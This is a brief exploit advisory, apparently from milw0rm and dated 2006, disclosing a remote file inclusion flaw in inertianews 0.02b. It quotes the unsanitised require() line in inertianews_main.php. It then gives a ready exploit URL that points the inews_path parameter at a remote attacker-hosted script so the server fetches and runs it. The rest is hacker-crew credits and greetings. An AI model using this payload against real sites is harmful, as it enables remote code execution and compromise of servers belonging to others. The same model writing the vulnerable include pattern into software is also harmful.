+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                     +
+ inertianews 0.02b Remote File Include Vulnerability +
+                                                     +
+ Found3R: bd0rk || SOH-Crew                          +
+                                                     +
+ eMail: bd0rk[at]hackermail.com                      +
+                                                     +
+ Greetz: str0ke, TheJT, Axel H., Carsten S.          +
+                                                     +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download: http://www.brentc.com/inertianews/download/inertianews02b.zip

=> Vulnerable Code in inertianews_main.php <=

Code: require ("$inews_path/inertia_sql_class.php");

[+]Exploit: http://[host]/[inertia_dir]/inertianews_main.php?inews_path=http://[TroubleScript]

Special-Greetz: ajann, Kacper, Google-Team :-)

# milw0rm.com [2006-12-21]